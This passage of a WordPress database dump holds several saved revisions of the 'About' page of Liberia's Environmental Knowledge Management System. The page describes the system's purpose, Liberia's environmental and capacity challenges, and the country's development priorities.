processes;</li>\n<li>Limited dissemination of key information (Republic of Liberia, 2013).</li>\n</ul>\n<p>Barriers were also reaffirmed in the Liberia Constraints Analysis (Government of Liberia, 2013).</p>		\n			<h2>What does the EKMS include?</h2>		\n		<!-- wp:paragraph -->\n<p>The Environmental Knowledge Management System (EKMS) is an integrated online knowledge platform which strive to draw on and complement a growing agenda on the Rio Conventions within the Natural Resource Management Sector and external partners to scale up environmental initiatives.</p>\n<!-- /wp:paragraph -->\n<!-- wp:paragraph -->\n<p>The EKMS provides free and open access to information from key government and other institutions in Liberia relating to the implementation of the Rio Conventions – The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. The EKMS is deployed under the supervision of Environmental Protection Agency (EPA) in collaboration with twelve relevant government institutions. Information access on this platform include reports, publications, case studies, tools and guidelines, institution’s technical documents, and other related materials.</p>\n<!-- /wp:paragraph -->\n<!-- wp:paragraph -->\n<p>Additionally, the EKMS provides a platform for government institutions and other contributors to share latest blogs, news and stories related to the Rio Conventions implementation process.</p>\n<!-- /wp:paragraph -->		\n			<h2>Acknowledgement</h2>		\n		<p>The EPA gratefully acknowledges financial support from the United Nations Development Programme (UNDP) - the Global Environmental Facility (GEF) for the development of this Environmental Knowledge Management System (EKMS).</p>		\n			<h2>Disclaimer</h2>		\n		<p>The Environmental Knowledge Management System (EKMS) provides free and open access to important information from key government and other institutions in Liberia on implementation of the Rio Conventions. The information in the EKMS is provided for informational and educational purposes only. This website contents can not be taken to reflect the views of its sponsors.</p>','About','','inherit','closed','closed','','68-revision-v1','','','2019-11-12 11:44:37','2019-11-12 11:44:37','',68,'https://ekmsliberia.info/68-revision-v1/',0,'revision','',0),(1954,1,'2019-11-12 11:46:48','2019-11-12 11:46:48','<h2>About the EKMS</h2>		\n			<h2>Why was the EKMS created?</h2>		\n		<p>In an effort to bridge knowledge management gaps, the EKMS was created to strengthen institutional coordination between the Environmental Protection Agency (EPA) and other Liberia government institutions as well as Nongovernmental Organizations that have direct linkages with environmental policies and development. It was also created to increase access and dissemination of key information and promote adequate public awareness and education.</p>\n<p>The EKMS is an output of the Cross-Cutting Capacity Development Project (CCCD). The project funded by the GEF and implemented by the EPA in partnership with the UNDP in collaboration with Natural Resources Management Agencies of Liberia. The project is in line with GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively.</p>\n<h3>Development Challenge</h3>\n<h4>A1. Global Environmental Challenges</h4>\n<p>Liberia is located on the southwest coast of Africa, and boarders the Ivory Coast, Guinea, and Sierra Leone. Liberia is divided into 15 counties, which are subdivided into 90 districts. Although Liberia is a rather small country, it has significant biodiversity. There are 600 bird species, 150 mammals, 75 reptiles and over 2000 flowering plants. Some notable species in Liberia include western chimpanzees, forest elephants, and leopards. Liberia also has rich forests; around 42% of the Upper Guinea Forest of West Africa is contained within Liberia (Republic of Liberia, 2014; Republic of Liberia, 2004). Liberia also has numerous natural resources such as timber, rubber, gold diamonds, and iron ore. Economically, the forestry and agriculture sectors are two of the most important sectors in Liberia. Agriculture accounts for over 70% of livelihoods (Dorliae, 2012).</p>\n<p>Liberia faces numerous environmental challenges including land degradation, fragmentation, deforestation, soil erosion, and pollution. The dependence on forestry presents a unique environmental risk as Liberia’s forest is part of the West African Hotspot. This (once) rich ecosystem has faced severe deforestation; only ten percent of the original forest remains, of which around 40% lies in Liberia. Unfortunately, this remaining forest is at risk serious risk of deforestation. Over the past two centuries, Liberia has lost over 60% of its forest cover (Republic of Liberia, 2004), and deforestation rates have increased since 2000. Increases in deforestation and land degradation are largely due to displaced people clearing land. Also contributing to deforestation, biodiversity loss, and land degradation is unsustainable farming practices, mining, charcoal production, invasive species, hunting, and unregulated timber extraction. Poaching is also rampant and mitigation measures are lacking; the draft Wildlife Management and Protected Areas Act remains in draft form (Dorliae, 2012).</p>\n<p>Climate change also poses a real threat to Liberia. Among other threats, Liberia’s economy and human health could be threatened by rising temperatures and water scarcity. Currently, the country does not have strong capacities for mitigation and adaptation; Liberia has no institutions that offer climate change education or research programs (although, the University of Liberia does offer programs on the environment). Additionally, there are no organized or coordinated programs for meteorological, hydrological, or climate research and observation. Currently, only fragmented services are available. Along with a lack of observation networks, government bodies are hindered by inadequately-trained staff (Environmental Protection Agency of Liberia, 2013).</p>\n<p>Although aware of the environmental situation, Liberia has struggled to address these environmental issues. The civil wars, which lasted for more than 10 years, served to exacerbate the situation. Poverty also presents a serious challenge; causing degradation and drawing attention and resources from environmental concerns. Over 60% of Liberians live in poverty. Of these, over 40% of citizens live in extreme poverty (Dorliae, 2012). The outbreak of Ebola in 2014 also threatened Liberia’s progress, as the crisis became a priority for the government and stretched already limited resources. Fortunately in January 2016 the outbreak was declared resolved. Overall, there has been slow progress in sustainable development and meeting obligations under the Rio Conventions.</p>\n<h4>Root Causes</h4>\n<p>There are a few key root causes of environmental degradation in Liberia. The most critical include: human settlements and population pressures; shifting cultivation; timber exploitation; and rubber plantations. More generally, root causes are related to over-exploitation of biological resources; poverty; political instability and wars; education; and inadequate law enforcement (Republic of Liberia, 2004). From a reporting perspective, one root cause of Liberia’s development challenges is the fact that Focal Points are located in different agencies, which thereby limits coordination and collaboration between them.</p>\n<h4>A2. Capacity Barriers</h4>\n<p>Liberia has undertaken numerous initiatives to address environmental issues. Despite the achievements Liberia made, Liberia continues to face important challenges to meeting environmental goals. As a Rio Convention mainstreaming project, the proposed strategy sets out to meet barriers identified in Liberia’s 2006 National Capacity Self-Assessment (NCSA), which was undertaken though a consultative process and participatory approach that involved numerous stakeholders from various sectors. Through the inclusive and consultative process of the NCSA, stakeholders identified a number of areas that explain the difficulty in fulfilling the obligations of the Rio Conventions. The NCSA identified the following barriers that cut across the three Rio Conventions:</p>\n<ul>\n<li style=\"list-style-type: none\">\n<ul>\n<li style=\"list-style-type: none;\">\n<ul>\n<li>Inadequate public awareness and education/training</li>\n<li>Inadequate institutions and institutional frameworks</li>\n<li>Inadequate political commitment</li>\n<li>Inadequate planning skills and resources, as well as incomplete structures at all levels of policy implementation</li>\n<li>Inadequate financial resources and economic framework</li>\n<li>Inadequate strategic plans and implementation</li>\n<li>Inadequate access to information</li>\n<li>Inadequate policies and legal frameworks</li>\n<li>Low level of involvement of civil society</li>\n<li>Inadequate natural resources management systems</li>\n<li>Lack of institutional capacities</li>\n<li>Lack of effective mechanism for information processing and sharing</li>\n<li>\n<p>Poor governance</p>\n</li>\n</ul>\n</li>\n</ul>\n</li>\n</ul><p>Liberia’s Agenda for Transformation 2012-2017 confirmed many of the barriers identified in the NCSA. Specifically, the agenda noted the following barriers:</p>\n<ul>\n<li>Weak technical, administrative and managerial capacities;</li>\n<li>Weak institutional coordination;</li>\n<li>Unclear policies and mechanisms to enable effective participation by especially non-state actors; at the national and local levels;</li>\n<li>Limited stakeholder participation in planning and decision-making processes;</li>\n<li>Limited dissemination of key information (Republic of Liberia, 2013).</li>\n</ul>\n<p>Barriers were also reaffirmed in the Liberia Constraints Analysis (Government of Liberia, 2013).</p>\n<h4>A.3 Consistency with National Priorities</h4> <p>The country has demonstrated a desire to improve the environmental policy framework with the preparation of multiple new policies including the National Environmental Protection and Management Law (2003), the National Environmental Policy (2003), the establishment of an Environmental Protection Agency, in 2003, the National Forestry Law (2000), and the New Mineral and Mining Laws (2000). In the first Poverty Reduction Strategy, the environment was considered a cross-cutting issue. Some achievements made during implementation of this strategy include passage of the Community Rights Law, which established a system for community harvesting of forests. Efforts were also undertaken to improve protected areas management and increase the size/number of protected areas. In Liberia’s medium-term Poverty Reduction Strategy II (2012-2018) there is a fifth pillar: Cross-Cutting Issues which includes the environment. Additionally, environmental issues have been integrated into other pillars of the strategy specifically the economic pillar. During the Liberia Rio +20 National Consultative Workshop, Liberia identified five issues that are essential for accomplishing its development goals and objectives. Additionally, Liberia has also developed a National Capacity Development Strategy (2010), which calls for investing in areas needed to achieve development goals. The project will assist the Government of Liberia to achieve the national priorities it has set in Liberia RISING 2030. The aim of this is to transform Liberia through a new development strategy, which was launched in December 2012. The overall objective is to turn Liberia into a middle income country by 2030. The project is also in line with Liberia’s National Biodiversity Strategy and Action Plan II (NBSAP) which aims to, as part of Liberia’s commitment to the Millennium Development Goals, and in line with the National Environmental Policy of Liberia, assist the people of Liberia to acknowledge and exercise responsible stewardship over biological resources to meet the needs of the present without endangering the ability of future generations to meet their own needs. Some of the goals are to protect critical ecosystems, create biodiversity awareness, and increase commitment to sustainable use of biological diversity (Republic of Liberia, 2017). Liberia’s 2008 National Adaptation Plan of Action (NAPA), as a response to the impacts of climate change, aligns with National Environmental Policy which calls for the sustainable management of Liberia’s environment and natural resources. The NAPA also aims to establish synergies between adaptation and national development plans, such as the National Reconstruction and Development Plan, Millennium Development Goals, and the National Biodiversity and Strategy Action Plan. The NAPA identifies key adaptation needs and list priority actions, such as enhancing resilience to increasing rainfall variability through agriculture, to address the needs. This project is also in line with Liberia’s UNDAF 2013-2017. The UN Country Team decided that the new UNDAF would also take into account the requirements of Delivering as One. Thus, in addition to the Strategic Framework and Results Matrix, the UNDAF is accompanied by a detailed Costed Action Plan. Together they constitute the One Programme. The four pillars of the One UN Programme are:</p>		\n			<h2>What does the EKMS include?</h2>		\n		<!-- wp:paragraph -->\n<p>The Environmental Knowledge Management System (EKMS) is an integrated online knowledge platform which strive to draw on and complement a growing agenda on the Rio Conventions within the Natural Resource Management Sector and external partners to scale up environmental initiatives.</p>\n<!-- /wp:paragraph -->\n<!-- wp:paragraph -->\n<p>The EKMS provides free and open access to information from key government and other institutions in Liberia relating to the implementation of the Rio Conventions – The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. The EKMS is deployed under the supervision of Environmental Protection Agency (EPA) in collaboration with twelve relevant government institutions. Information access on this platform include reports, publications, case studies, tools and guidelines, institution’s technical documents, and other related materials.</p>\n<!-- /wp:paragraph -->\n<!-- wp:paragraph -->\n<p>Additionally, the EKMS provides a platform for government institutions and other contributors to share latest blogs, news and stories related to the Rio Conventions implementation process.</p>\n<!-- /wp:paragraph -->		\n			<h2>Acknowledgement</h2>		\n		<p>The EPA gratefully acknowledges financial support from the United Nations Development Programme (UNDP) - the Global Environmental Facility (GEF) for the development of this Environmental Knowledge Management System (EKMS).</p>		\n			<h2>Disclaimer</h2>		\n		<p>The Environmental Knowledge Management System (EKMS) provides free and open access to important information from key government and other institutions in Liberia on implementation of the Rio Conventions. The information in the EKMS is provided for informational and educational purposes only. This website contents can not be taken to reflect the views of its sponsors.</p>','About','','inherit','closed','closed','','68-revision-v1','','','2019-11-12 11:46:48','2019-11-12 11:46:48','',68,'https://ekmsliberia.info/68-revision-v1/',0,'revision','',0),(1955,1,'2019-11-12 11:48:50','2019-11-12 11:48:50','<h2>About the EKMS</h2>		\n			<h2>Why was the EKMS created?</h2>		\n		<p>In an effort to bridge knowledge management gaps, the EKMS was created to strengthen institutional coordination between the Environmental Protection Agency (EPA) and other Liberia government institutions as well as Nongovernmental Organizations that have direct linkages with environmental policies and development. It was also created to increase access and dissemination of key information and promote adequate public awareness and education.</p>\n<p>The EKMS is an output of the Cross-Cutting Capacity Development Project (CCCD). The project funded by the GEF and implemented by the EPA in partnership with the UNDP in collaboration with Natural Resources Management Agencies of Liberia. The project is in line with GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively.</p>\n<h3>Development Challenge</h3>\n<h4>A1. Global Environmental Challenges</h4>\n<p>Liberia is located on the southwest coast of Africa, and boarders the Ivory Coast, Guinea, and Sierra Leone. Liberia is divided into 15 counties, which are subdivided into 90 districts. Although Liberia is a rather small country, it has significant biodiversity. There are 600 bird species, 150 mammals, 75 reptiles and over 2000 flowering plants. Some notable species in Liberia include western chimpanzees, forest elephants, and leopards. Liberia also has rich forests; around 42% of the Upper Guinea Forest of West Africa is contained within Liberia (Republic of Liberia, 2014; Republic of Liberia, 2004). Liberia also has numerous natural resources such as timber, rubber, gold diamonds, and iron ore. Economically, the forestry and agriculture sectors are two of the most important sectors in Liberia. Agriculture accounts for over 70% of livelihoods (Dorliae, 2012).</p>\n<p>Liberia faces numerous environmental challenges including land degradation, fragmentation, deforestation, soil erosion, and pollution. The dependence on forestry presents a unique environmental risk as Liberia’s forest is part of the West African Hotspot. This (once) rich ecosystem has faced severe deforestation; only ten percent of the original forest remains, of which around 40% lies in Liberia. Unfortunately, this remaining forest is at risk serious risk of deforestation. Over the past two centuries, Liberia has lost over 60% of its forest cover (Republic of Liberia, 2004), and deforestation rates have increased since 2000. Increases in deforestation and land degradation are largely due to displaced people clearing land. Also contributing to deforestation, biodiversity loss, and land degradation is unsustainable farming practices, mining, charcoal production, invasive species, hunting, and unregulated timber extraction. Poaching is also rampant and mitigation measures are lacking; the draft Wildlife Management and Protected Areas Act remains in draft form (Dorliae, 2012).</p>\n<p>Climate change also poses a real threat to Liberia. Among other threats, Liberia’s economy and human health could be threatened by rising temperatures and water scarcity. Currently, the country does not have strong capacities for mitigation and adaptation; Liberia has no institutions that offer climate change education or research programs (although, the University of Liberia does offer programs on the environment). Additionally, there are no organized or coordinated programs for meteorological, hydrological, or climate research and observation. Currently, only fragmented services are available. Along with a lack of observation networks, government bodies are hindered by inadequately-trained staff (Environmental Protection Agency of Liberia, 2013).</p>\n<p>Although aware of the environmental situation, Liberia has struggled to address these environmental issues. The civil wars, which lasted for more than 10 years, served to exacerbate the situation. Poverty also presents a serious challenge; causing degradation and drawing attention and resources from environmental concerns. Over 60% of Liberians live in poverty. Of these, over 40% of citizens live in extreme poverty (Dorliae, 2012). The outbreak of Ebola in 2014 also threatened Liberia’s progress, as the crisis became a priority for the government and stretched already limited resources. Fortunately in January 2016 the outbreak was declared resolved. Overall, there has been slow progress in sustainable development and meeting obligations under the Rio Conventions.</p>\n<h4>Root Causes</h4>\n<p>There are a few key root causes of environmental degradation in Liberia. The most critical include: human settlements and population pressures; shifting cultivation; timber exploitation; and rubber plantations. More generally, root causes are related to over-exploitation of biological resources; poverty; political instability and wars; education; and inadequate law enforcement (Republic of Liberia, 2004). From a reporting perspective, one root cause of Liberia’s development challenges is the fact that Focal Points are located in different agencies, which thereby limits coordination and collaboration between them.</p>\n<h4>A2. Capacity Barriers</h4>\n<p>Liberia has undertaken numerous initiatives to address environmental issues. Despite the achievements Liberia made, Liberia continues to face important challenges to meeting environmental goals. As a Rio Convention mainstreaming project, the proposed strategy sets out to meet barriers identified in Liberia’s 2006 National Capacity Self-Assessment (NCSA), which was undertaken though a consultative process and participatory approach that involved numerous stakeholders from various sectors. Through the inclusive and consultative process of the NCSA, stakeholders identified a number of areas that explain the difficulty in fulfilling the obligations of the Rio Conventions. The NCSA identified the following barriers that cut across the three Rio Conventions:</p>\n<ul>\n<li style=\"list-style-type: none\">\n<ul>\n<li style=\"list-style-type: none;\">\n<ul>\n<li>Inadequate public awareness and education/training</li>\n<li>Inadequate institutions and institutional frameworks</li>\n<li>Inadequate political commitment</li>\n<li>Inadequate planning skills and resources, as well as incomplete structures at all levels of policy implementation</li>\n<li>Inadequate financial resources and economic framework</li>\n<li>Inadequate strategic plans and implementation</li>\n<li>Inadequate access to information</li>\n<li>Inadequate policies and legal frameworks</li>\n<li>Low level of involvement of civil society</li>\n<li>Inadequate natural resources management systems</li>\n<li>Lack of institutional capacities</li>\n<li>Lack of effective mechanism for information processing and sharing</li>\n<li>\n<p>Poor governance</p>\n</li>\n</ul>\n</li>\n</ul>\n</li>\n</ul><p>Liberia’s Agenda for Transformation 2012-2017 confirmed many of the barriers identified in the NCSA. Specifically, the agenda noted the following barriers:</p>\n<ul>\n<li>Weak technical, administrative and managerial capacities;</li>\n<li>Weak institutional coordination;</li>\n<li>Unclear policies and mechanisms to enable effective participation by especially non-state actors; at the national and local levels;</li>\n<li>Limited stakeholder participation in planning and decision-making processes;</li>\n<li>Limited dissemination of key information (Republic of Liberia, 2013).</li>\n</ul>\n<p>Barriers were also reaffirmed in the Liberia Constraints Analysis (Government of Liberia, 2013).</p>\n<h4>A.3 Consistency with National Priorities</h4>\n<p>The country has demonstrated a desire to improve the environmental policy framework with the preparation of multiple new policies including the National Environmental Protection and Management Law (2003), the National Environmental Policy (2003), the establishment of an Environmental Protection Agency, in 2003, the National Forestry Law (2000), and the New Mineral and Mining Laws (2000).</p>\n<p>In the first Poverty Reduction Strategy, the environment was considered a cross-cutting issue. Some achievements made during implementation of this strategy include passage of the Community Rights Law, which established a system for community harvesting of forests. Efforts were also undertaken to improve protected areas management and increase the size/number of protected areas. In Liberia’s medium-term Poverty Reduction Strategy II (2012-2018) there is a fifth pillar: Cross-Cutting Issues which includes the environment. Additionally, environmental issues have been integrated into other pillars of the strategy specifically the economic pillar.</p>\n<p>During the Liberia Rio +20 National Consultative Workshop, Liberia identified five issues that are essential for accomplishing its development goals and objectives. Additionally, Liberia has also developed a National Capacity Development Strategy (2010), which calls for investing in areas needed to achieve development goals.</p>\n<p>The project will assist the Government of Liberia to achieve the national priorities it has set in Liberia RISING 2030. The aim of this is to transform Liberia through a new development strategy, which was launched in December 2012. The overall objective is to turn Liberia into a middle income country by 2030.</p>\n<p>The project is also in line with Liberia’s National Biodiversity Strategy and Action Plan II (NBSAP) which aims to, as part of Liberia’s commitment to the Millennium Development Goals, and in line with the National Environmental Policy of Liberia, assist the people of Liberia to acknowledge and exercise responsible stewardship over biological resources to meet the needs of the present without endangering the ability of future generations to meet their own needs. Some of the goals are to protect critical ecosystems, create biodiversity awareness, and increase commitment to sustainable use of biological diversity (Republic of Liberia, 2017).</p>\n<p>Liberia’s 2008 National Adaptation Plan of Action (NAPA), as a response to the impacts of climate change, aligns with National Environmental Policy which calls for the sustainable management of Liberia’s environment and natural resources. The NAPA also aims to establish synergies between adaptation and national development plans, such as the National Reconstruction and Development Plan, Millennium Development Goals, and the National Biodiversity and Strategy Action Plan. The NAPA identifies key adaptation needs and list priority actions, such as enhancing resilience to increasing rainfall variability through agriculture, to address the needs.</p>\n<p>This project is also in line with Liberia’s UNDAF 2013-2017. The UN Country Team decided that the new UNDAF would also take into account the requirements of Delivering as One. Thus, in addition to the Strategic Framework and Results Matrix, the UNDAF is accompanied by a detailed Costed Action Plan. Together they constitute the One Programme. The four pillars of the One UN Programme are:</p>\n<p> </p>		\n			<h2>What does the EKMS include?</h2>		\n		<!-- wp:paragraph -->\n<p>The Environmental Knowledge Management System (EKMS) is an integrated online knowledge platform which strive to draw on and complement a growing agenda on the Rio Conventions within the Natural Resource Management Sector and external partners to scale up environmental initiatives.</p>\n<!-- /wp:paragraph -->\n<!-- wp:paragraph -->\n<p>The EKMS provides free and open access to information from key government and other institutions in Liberia relating to the implementation of the Rio Conventions – The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. The EKMS is deployed under the supervision of Environmental Protection Agency (EPA) in collaboration with twelve relevant government institutions. Information access on this platform include reports, publications, case studies, tools and guidelines, institution’s technical documents, and other related materials.</p>\n<!-- /wp:paragraph -->\n<!-- wp:paragraph -->\n<p>Additionally, the EKMS provides a platform for government institutions and other contributors to share latest blogs, news and stories related to the Rio Conventions implementation process.</p>\n<!-- /wp:paragraph -->		\n			<h2>Acknowledgement</h2>		\n		<p>The EPA gratefully acknowledges financial support from the United Nations Development Programme (UNDP) - the Global Environmental Facility (GEF) for the development of this Environmental Knowledge Management System (EKMS).</p>		\n			<h2>Disclaimer</h2>		\n		<p>The Environmental Knowledge Management System (EKMS) provides free and open access to important information from key government and other institutions in Liberia on implementation of the Rio Conventions. The information in the EKMS is provided for informational and educational purposes only. This website contents can not be taken to reflect the views of its sponsors.</p>','About','','inherit','closed','closed','','68-revision-v1','','','2019-11-12 11:48:50','2019-11-12 11:48:50','',68,'https://ekmsliberia.info/68-revision-v1/',0,'revision','',0),(1956,1,'2019-11-12 11:51:49','2019-11-12 11:51:49','<h2>About the EKMS</h2>		\n			<h2>Why was the EKMS created?</h2>		\n		<p>In an effort to bridge knowledge management gaps, the EKMS was created to strengthen institutional coordination between the Environmental Protection Agency (EPA) and other Liberia government institutions as well as Nongovernmental Organizations that have direct linkages with environmental policies and development. It was also created to increase access and dissemination of key information and promote adequate public awareness and education.</p>\n<p>The EKMS is an output of the Cross-Cutting Capacity Development Project (CCCD). The project funded by the GEF and implemented by the EPA in partnership with the UNDP in collaboration with Natural Resources Management Agencies of Liberia. The project is in line with GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively.</p>\n<h3>Development Challenge</h3>\n<h4>A1. Global Environmental Challenges</h4>\n<p>Liberia is located on the southwest coast of Africa, and boarders the Ivory Coast, Guinea, and Sierra Leone. Liberia is divided into 15 counties, which are subdivided into 90 districts. Although Liberia is a rather small country, it has significant biodiversity. There are 600 bird species, 150 mammals, 75 reptiles and over 2000 flowering plants. Some notable species in Liberia include western chimpanzees, forest elephants, and leopards. Liberia also has rich forests; around 42% of the Upper Guinea Forest of West Africa is contained within Liberia (Republic of Liberia, 2014; Republic of Liberia, 2004). Liberia also has numerous natural resources such as timber, rubber, gold diamonds, and iron ore. Economically, the forestry and agriculture sectors are two of the most important sectors in Liberia. Agriculture accounts for over 70% of livelihoods (Dorliae, 2012).</p>\n<p>Liberia faces numerous environmental challenges including land degradation, fragmentation, deforestation, soil erosion, and pollution. The dependence on forestry presents a unique environmental risk as Liberia’s forest is part of the West African Hotspot. This (once) rich ecosystem has faced severe deforestation; only ten percent of the original forest remains, of which around 40% lies in Liberia. Unfortunately, this remaining forest is at risk serious risk of deforestation. Over the past two centuries, Liberia has lost over 60% of its forest cover (Republic of Liberia, 2004), and deforestation rates have increased since 2000. Increases in deforestation and land degradation are largely due to displaced people clearing land. Also contributing to deforestation, biodiversity loss, and land degradation is unsustainable farming practices, mining, charcoal production, invasive species, hunting, and unregulated timber extraction. Poaching is also rampant and mitigation measures are lacking; the draft Wildlife Management and Protected Areas Act remains in draft form (Dorliae, 2012).</p>\n<p>Climate change also poses a real threat to Liberia. Among other threats, Liberia’s economy and human health could be threatened by rising temperatures and water scarcity. Currently, the country does not have strong capacities for mitigation and adaptation; Liberia has no institutions that offer climate change education or research programs (although, the University of Liberia does offer programs on the environment). Additionally, there are no organized or coordinated programs for meteorological, hydrological, or climate research and observation. Currently, only fragmented services are available. Along with a lack of observation networks, government bodies are hindered by inadequately-trained staff (Environmental Protection Agency of Liberia, 2013).</p>\n<p>Although aware of the environmental situation, Liberia has struggled to address these environmental issues. The civil wars, which lasted for more than 10 years, served to exacerbate the situation. Poverty also presents a serious challenge; causing degradation and drawing attention and resources from environmental concerns. Over 60% of Liberians live in poverty. Of these, over 40% of citizens live in extreme poverty (Dorliae, 2012). The outbreak of Ebola in 2014 also threatened Liberia’s progress, as the crisis became a priority for the government and stretched already limited resources. Fortunately in January 2016 the outbreak was declared resolved. Overall, there has been slow progress in sustainable development and meeting obligations under the Rio Conventions.</p>\n<h4>Root Causes</h4>\n<p>There are a few key root causes of environmental degradation in Liberia. The most critical include: human settlements and population pressures; shifting cultivation; timber exploitation; and rubber plantations. More generally, root causes are related to over-exploitation of biological resources; poverty; political instability and wars; education; and inadequate law enforcement (Republic of Liberia, 2004). From a reporting perspective, one root cause of Liberia’s development challenges is the fact that Focal Points are located in different agencies, which thereby limits coordination and collaboration between them.</p>\n<h4>A2. Capacity Barriers</h4>\n<p>Liberia has undertaken numerous initiatives to address environmental issues. Despite the achievements Liberia made, Liberia continues to face important challenges to meeting environmental goals. As a Rio Convention mainstreaming project, the proposed strategy sets out to meet barriers identified in Liberia’s 2006 National Capacity Self-Assessment (NCSA), which was undertaken though a consultative process and participatory approach that involved numerous stakeholders from various sectors. Through the inclusive and consultative process of the NCSA, stakeholders identified a number of areas that explain the difficulty in fulfilling the obligations of the Rio Conventions. The NCSA identified the following barriers that cut across the three Rio Conventions:</p>\n<ul>\n<li style=\"list-style-type: none\">\n<ul>\n<li style=\"list-style-type: none;\">\n<ul>\n<li>Inadequate public awareness and education/training</li>\n<li>Inadequate institutions and institutional frameworks</li>\n<li>Inadequate political commitment</li>\n<li>Inadequate planning skills and resources, as well as incomplete structures at all levels of policy implementation</li>\n<li>Inadequate financial resources and economic framework</li>\n<li>Inadequate strategic plans and implementation</li>\n<li>Inadequate access to information</li>\n<li>Inadequate policies and legal frameworks</li>\n<li>Low level of involvement of civil society</li>\n<li>Inadequate natural resources management systems</li>\n<li>Lack of institutional capacities</li>\n<li>Lack of effective mechanism for information processing and sharing</li>\n<li>\n<p>Poor governance</p>\n</li>\n</ul>\n</li>\n</ul>\n</li>\n</ul><p>Liberia’s Agenda for Transformation 2012-2017 confirmed many of the barriers identified in the NCSA. Specifically, the agenda noted the following barriers:</p>\n<ul>\n<li>Weak technical, administrative and managerial capacities;</li>\n<li>Weak institutional coordination;</li>\n<li>Unclear policies and mechanisms to enable effective participation by especially non-state actors; at the national and local levels;</li>\n<li>Limited stakeholder participation in planning and decision-making processes;</li>\n<li>Limited dissemination of key information (Republic of Liberia, 2013).</li>\n</ul>\n<p>Barriers were also reaffirmed in the Liberia Constraints Analysis (Government of Liberia, 2013).</p>\n<h4>A.3 Consistency with National Priorities</h4>\n<p>The country has demonstrated a desire to improve the environmental policy framework with the preparation of multiple new policies including the National Environmental Protection and Management Law (2003), the National Environmental Policy (2003), the establishment of an Environmental Protection Agency, in 2003, the National Forestry Law (2000), and the New Mineral and Mining Laws (2000).</p>\n<p>In the first Poverty Reduction Strategy, the environment was considered a cross-cutting issue. Some achievements made during implementation of this strategy include passage of the Community Rights Law, which established a system for community harvesting of forests. Efforts were also undertaken to improve protected areas management and increase the size/number of protected areas. In Liberia’s medium-term Poverty Reduction Strategy II (2012-2018) there is a fifth pillar: Cross-Cutting Issues which includes the environment. Additionally, environmental issues have been integrated into other pillars of the strategy specifically the economic pillar.</p>\n<p>During the Liberia Rio +20 National Consultative Workshop, Liberia identified five issues that are essential for accomplishing its development goals and objectives. Additionally, Liberia has also developed a National Capacity Development Strategy (2010), which calls for investing in areas needed to achieve development goals.</p>\n<p>The project will assist the Government of Liberia to achieve the national priorities it has set in Liberia RISING 2030. The aim of this is to transform Liberia through a new development strategy, which was launched in December 2012. The overall objective is to turn Liberia into a middle income country by 2030.</p>\n<p>The project is also in line with Liberia’s National Biodiversity Strategy and Action Plan II (NBSAP) which aims to, as part of Liberia’s commitment to the Millennium Development Goals, and in line with the National Environmental Policy of Liberia, assist the people of Liberia to acknowledge and exercise responsible stewardship over biological resources to meet the needs of the present without endangering the ability of future generations to meet their own needs. Some of the goals are to protect critical ecosystems, create biodiversity awareness, and increase commitment to sustainable use of biological diversity (Republic of Liberia, 2017).</p>\n<p>Liberia’s 2008 National Adaptation Plan of Action (NAPA), as a response to the impacts of climate change, aligns with National Environmental Policy which calls for the sustainable management of Liberia’s environment and natural resources. The NAPA also aims to establish synergies between adaptation and national development plans, such as the National Reconstruction and Development Plan, Millennium Development Goals, and the National Biodiversity and Strategy Action Plan. The NAPA identifies key adaptation needs and list priority actions, such as enhancing resilience to increasing rainfall variability through agriculture, to address the needs.</p>\n<p>This project is also in line with Liberia’s UNDAF 2013-2017. The UN Country Team decided that the new UNDAF would also take into account the requirements of Delivering as One. Thus, in addition to the Strategic Framework and Results Matrix, the UNDAF is accompanied by a detailed Costed Action Plan. Together they constitute the One Programme. The four pillars of the One UN Programme are:</p>\n<ul>\n<li>Peace, Security, Rule of Law</li>\n<li>Sustainable Economic Transformation</li>\n<li>Human Development</li>\n<li>Inclusive Governance and Public Institutions</li>\n</ul>\n<p>The UNDAF (One Programme) also aligns with Liberia’s National medium-term strategy, known as the Agenda for Transformation.  The Agenda for Transformation is based on five pillars:</p>		\n			<h2>What does the EKMS include?</h2>		\n		<!-- wp:paragraph -->\n<p>The Environmental Knowledge Management System (EKMS) is an integrated online knowledge platform which strive to draw on and complement a growing agenda on the Rio Conventions within the Natural Resource Management Sector and external partners to scale up environmental initiatives.</p>\n<!-- /wp:paragraph -->\n<!-- wp:paragraph -->\n<p>The EKMS provides free and open access to information from key government and other institutions in Liberia relating to the implementation of the Rio Conventions – The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. The EKMS is deployed under the supervision of Environmental Protection Agency (EPA) in collaboration with twelve relevant government institutions. Information access on this platform include reports, publications, case studies, tools and guidelines, institution’s technical documents, and other related materials.</p>\n<!-- /wp:paragraph -->\n<!-- wp:paragraph -->\n<p>Additionally, the EKMS provides a platform for government institutions and other contributors to share latest blogs, news and stories related to the Rio Conventions implementation process.</p>\n<!-- /wp:paragraph -->		\n			<h2>Acknowledgement</h2>		\n		<p>The EPA gratefully acknowledges financial support from the United Nations Development Programme (UNDP) - the Global Environmental Facility (GEF) for the development of this Environmental Knowledge Management System (EKMS).</p>		\n			<h2>Disclaimer</h2>		\n		<p>The Environmental Knowledge Management System (EKMS) provides free and open access to important information from key government and other institutions in Liberia on implementation of the Rio Conventions. The information in the EKMS is provided for informational and educational purposes only. This website contents can not be taken to reflect the views of its sponsors.</p>','About','','inherit','closed','closed','','68-revision-v1','','','2019-11-12 11:51:49','2019-11-12 11:51:49','',68,'https://ekmsliberia.info/68-revision-v1/',0,'revision','',0),(1958,1,'2019-11-12 11:59:14','2019-11-12 11:59:14','<h2>About the EKMS</h2>		\n			<h2>Why was the EKMS created?</h2>		\n		<p>In an effort to bridge knowledge management gaps, the EKMS was created to strengthen institutional coordination between the 